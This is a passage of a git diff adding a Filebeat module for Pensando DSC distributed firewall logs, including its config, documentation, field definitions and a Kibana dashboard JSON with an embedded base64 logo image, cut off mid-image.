+ ecs.version: 1.8.0 diff --git a/filebeat/module/pensando/_meta/config.yml b/filebeat/module/pensando/_meta/config.yml new file mode 100644 index 000000000000..e632160bdd77 --- /dev/null +++ b/filebeat/module/pensando/_meta/config.yml @@ -0,0 +1,10 @@ +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: diff --git a/filebeat/module/pensando/_meta/docs.asciidoc b/filebeat/module/pensando/_meta/docs.asciidoc new file mode 100644 index 000000000000..611ccdf01ca2 --- /dev/null +++ b/filebeat/module/pensando/_meta/docs.asciidoc @@ -0,0 +1,56 @@ +:modulename: pensando +:has-dashboards: true + +== pensando module + +The +{modulename}+ module parses distributed firewall logs created by the +http://pensando.io/[Pensando] distributed services card (DSC). + + +include::../include/what-happens.asciidoc[] + +include::../include/gs-link.asciidoc[] + +[float] +=== Compatibility + +The Pensando module has been tested with 1.12.0-E-54 and later. + +include::../include/configuring-intro.asciidoc[] +The following example shows how to set parameters in the +modules.d/{modulename}.yml+ +file to listen for firewall logs sent from the Pensando DSC(s) on port 5514 (default is 9001): + +["source","yaml",subs="attributes"] +----- +- module: pensando + access: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: [9001] +----- +:fileset_ex: dfw + +include::../include/config-option-intro.asciidoc[] + +TODO: document the variables from each fileset. If you're describing a variable +that's common to other modules, you can reuse shared descriptions by including +the relevant file. For example: + +[float] +==== `dfw` log fileset settings + +include::../include/var-paths.asciidoc[] + +[float] +=== Example dashboard + +This module comes with a sample dashboard. For example: + +[role="screenshot"] +image::./images/filebeat-pensando-dfw.png[] + +:has-dashboards!: + +:fileset_ex!: + +:modulename!: diff --git a/filebeat/module/pensando/_meta/fields.yml b/filebeat/module/pensando/_meta/fields.yml new file mode 100644 index 000000000000..f4dba1a22bab --- /dev/null +++ b/filebeat/module/pensando/_meta/fields.yml @@ -0,0 +1,10 @@ +- key: pensando + title: Pensando + description: > + pensando Module + fields: + - name: pensando + type: group + description: > + Fields from Pensando logs. + fields: diff --git a/filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json b/filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json new file mode 100644 index 000000000000..33ebc169841b --- /dev/null +++ b/filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json @@ -0,0 +1,1341 @@ +{ + "objects": [ + { + "attributes": { + "description": "Overview of events coming from Pensando DSC distributed firewall system.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": false + }, + "panelsJSON": [ + { + "embeddableConfig": { + "title": "" + }, + "gridData": { + "h": 5, + "i": "85119076-2756-4415-8917-14c9d46732a5", + "w": 41, + "x": 0, + "y": 0 + }, + "panelIndex": "85119076-2756-4415-8917-14c9d46732a5", + "panelRefName": "panel_0", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "" + }, + "gridData": { + "h": 5, + "i": "9215c2be-bca5-4b21-8042-0e0be99e38c0", + "w": 7, + "x": 41, + "y": 0 + }, + "panelIndex": "9215c2be-bca5-4b21-8042-0e0be99e38c0", + "panelRefName": "panel_1", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Active Workloads" + }, + "gridData": { + "h": 9, + "i": "81013c87-76c2-4ff0-9545-1295babad06e", + "w": 8, + "x": 0, + "y": 5 + }, + "panelIndex": "81013c87-76c2-4ff0-9545-1295babad06e", + "panelRefName": "panel_2", + "title": "Active Workloads", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "DFW Allowed Count" + }, + "gridData": { + "h": 9, + "i": "3ee01275-08dd-4d3f-9834-d844f5550365", + "w": 8, + "x": 8, + "y": 5 + }, + "panelIndex": "3ee01275-08dd-4d3f-9834-d844f5550365", + "panelRefName": "panel_3", + "title": "DFW Allowed Count", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "DFW Denied Count" + }, + "gridData": { + "h": 9, + "i": "9628e969-1f18-4659-a8d9-e9409f11f3a9", + "w": 8, + "x": 16, + "y": 5 + }, + "panelIndex": "9628e969-1f18-4659-a8d9-e9409f11f3a9", + "panelRefName": "panel_4", + "title": "DFW Denied Count", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Denied Destination IPs" + }, + "gridData": { + "h": 11, + "i": "37787af1-b5ef-467e-8c5e-b0dfba56c9f9", + "w": 24, + "x": 24, + "y": 5 + }, + "panelIndex": "37787af1-b5ef-467e-8c5e-b0dfba56c9f9", + "panelRefName": "panel_5", + "title": "Denied Destination IPs", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Traffic by Workload" + }, + "gridData": { + "h": 14, + "i": "efafcbff-a163-4475-8d12-59f716e5a3ef", + "w": 12, + "x": 0, + "y": 14 + }, + "panelIndex": "efafcbff-a163-4475-8d12-59f716e5a3ef", + "panelRefName": "panel_6", + "title": "Traffic by Workload", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Client to Server FW Action" + }, + "gridData": { + "h": 14, + "i": "52506949-eb15-4b23-b50c-2e5083df5e0f", + "w": 12, + "x": 12, + "y": 14 + }, + "panelIndex": "52506949-eb15-4b23-b50c-2e5083df5e0f", + "panelRefName": "panel_7", + "title": "Client to Server FW Action", + "version": "7.8.0" + }, + { + "embeddableConfig": {}, + "gridData": { + "h": 13, + "i": "077406bd-aa47-4dc9-b1f6-04cae0ae34b6", + "w": 24, + "x": 24, + "y": 16 + }, + "panelIndex": "077406bd-aa47-4dc9-b1f6-04cae0ae34b6", + "panelRefName": "panel_8", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "vis": { + "legendOpen": false + } + }, + "gridData": { + "h": 14, + "i": "58e763b7-a23a-480a-a984-24dd115aba2c", + "w": 12, + "x": 0, + "y": 28 + }, + "panelIndex": "58e763b7-a23a-480a-a984-24dd115aba2c", + "panelRefName": "panel_9", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "table": null, + "title": "Dest Port by DSC", + "vis": { + "legendOpen": false + } + }, + "gridData": { + "h": 14, + "i": "36fc48c8-0044-4af6-a8b2-da8023806f32", + "w": 12, + "x": 12, + "y": 28 + }, + "panelIndex": "36fc48c8-0044-4af6-a8b2-da8023806f32", + "panelRefName": "panel_10", + "title": "Dest Port by DSC", + "version": "7.8.0" + }, + { + "embeddableConfig": {}, + "gridData": { + "h": 13, + "i": "a1d34501-4d64-4213-b192-1b4ca2d88793", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "a1d34501-4d64-4213-b192-1b4ca2d88793", + "panelRefName": "panel_11", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "[Filebeat Pensando] DFW Overview", + "version": 1 + }, + "id": "2713ee40-f3b1-11ea-ba07-c1efedbf0bf9", + "migrationVersion": { + "dashboard": "7.3.0" + }, + "references": [ + { + "id": "a73c8dc0-cc8d-11ea-918e-c778f7abe5d7", + "name": "panel_0", + "type": "visualization" + }, + { + "id": "39e26d70-cc4d-11ea-918e-c778f7abe5d7", + "name": "panel_1", + "type": "visualization" + }, + { + "id": "bc6a36b0-cdba-11ea-a0ef-8f5241e594be", + "name": "panel_2", + "type": "visualization" + }, + { + "id": "fa745d10-cc88-11ea-918e-c778f7abe5d7", + "name": "panel_3", + "type": "visualization" + }, + { + "id": "1d2d5f00-cc89-11ea-918e-c778f7abe5d7", + "name": "panel_4", + "type": "visualization" + }, + { + "id": "bf9d4650-cc8a-11ea-918e-c778f7abe5d7", + "name": "panel_5", + "type": "visualization" + }, + { + "id": "07983660-cd38-11ea-a0ef-8f5241e594be", + "name": "panel_6", + "type": "visualization" + }, + { + "id": "fd2202d0-cc86-11ea-918e-c778f7abe5d7", + "name": "panel_7", + "type": "visualization" + }, + { + "id": "2aa5d850-cc85-11ea-918e-c778f7abe5d7", + "name": "panel_8", + "type": "visualization" + }, + { + "id": "b8bfd3e0-e8b7-11ea-ba07-c1efedbf0bf9", + "name": "panel_9", + "type": "visualization" + }, + { + "id": "c6188140-cdb9-11ea-a0ef-8f5241e594be", + "name": "panel_10", + "type": "visualization" + }, + { + "id": "0583e120-cc8f-11ea-918e-c778f7abe5d7", + "name": "panel_11", + "type": "visualization" + } + ], + "type": "dashboard", + "updated_at": "2020-09-10T22:32:33.177Z", + "version": "WzI1NjMsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Client/Server - input list [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [], + "params": { + "controls": [ + { + "fieldName": "client.ip", + "id": "1595471403191", + "indexPatternRefName": "control_0_index_pattern", + "label": "Client", + "options": { + "dynamicOptions": true, + "multiselect": false, + "order": "desc", + "size": 500, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "server.ip", + "id": "1595471807689", + "indexPatternRefName": "control_1_index_pattern", + "label": "Server", + "options": { + "dynamicOptions": true, + "multiselect": false, + "order": "desc", + "size": 500, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "log.source.address", + "id": "1595471848091", + "indexPatternRefName": "control_2_index_pattern", + "label": "DSC", + "options": { + "dynamicOptions": false, + "multiselect": false, + "order": "desc", + "size": 500, + "type": "terms" + }, + "parent": "", + "type": "list" + } + ], + "pinFilters": true, + "updateFiltersOnChange": true, + "useTimeFilter": true + }, + "title": "Client/Server - input list [Filebeat Pensando]", + "type": "input_control_vis" + } + }, + "id": "a73c8dc0-cc8d-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "control_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "filebeat-*", + "name": "control_1_index_pattern", + "type": "index-pattern" + }, + { + "id": "filebeat-*", + "name": "control_2_index_pattern", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:58:28.390Z", + "version": "WzI0OTMsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": { + "match_all": {} + } + } + } + }, + "title": "Logo [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [], + "params": { + "fontSize": 8, + "markdown": "[![Pensando](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASAAAABJCAYAAACdD/umAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAF42lUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDggNzkuMTY0MDM2LCAyMDE5LzA4LzEzLTAxOjA2OjU3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIwLTA3LTIyVDE0OjQ3OjMwLTA2OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMC0wNy0yMlQxNDo0OToyMi0wNjowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAyMC0wNy0yMlQxNDo0OToyMi0wNjowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpkMTUyMWZhMi0wZjgzLWMzNDItYmQzZC03ZGVkYmRiNThmNjQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6ZTc4NjkzZWMtOGViNC03NTRlLWFiMzgtMTZmMGY3ZDRhNzg1IiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6ZTc4NjkzZWMtOGViNC03NTRlLWFiMzgtMTZmMGY3ZDRhNzg1Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDplNzg2OTNlYy04ZWI0LTc1NGUtYWIzOC0xNmYwZjdkNGE3ODUiIHN0RXZ0OndoZW49IjIwMjAtMDctMjJUMTQ6NDc6MzAtMDY6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4wIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6ZDE1MjFmYTItMGY4My1jMzQyLWJkM2QtN2RlZGJkYjU4ZjY0IiBzdEV2dDp3aGVuPSIyMDIwLTA3LTIyVDE0OjQ5OjIyLTA2OjAwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPC9yZGY6U2VxPiA8L3htcE1NOkhpc3Rvcnk+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+LBGpEgAAMvVJREFUeJztvXecXkd97/+eOe3p27sk27Il27KQbVkGG7Ax2DRjMK70EmpCICSEy025N8ANhOAE8ruFFLi5JBSDCxjiggXYuADuNm5qlmWtyq6216efM/P7Y85TdvfZ1e5qJRnyfF6vZ8tzzpQzZ+Y73z5i11PPQi5H8amnzszfeecVemIiKlzXp4466qhjpaC10Pm8bZ911j7v4kv+j1zVw7qXbMAWnocaGyPYtu0KcrlrhGVFgOB497eOOur4nYIQtm2pgwf7gj17HrJOXvsIgO0/9dSm4pNPXZ7feudn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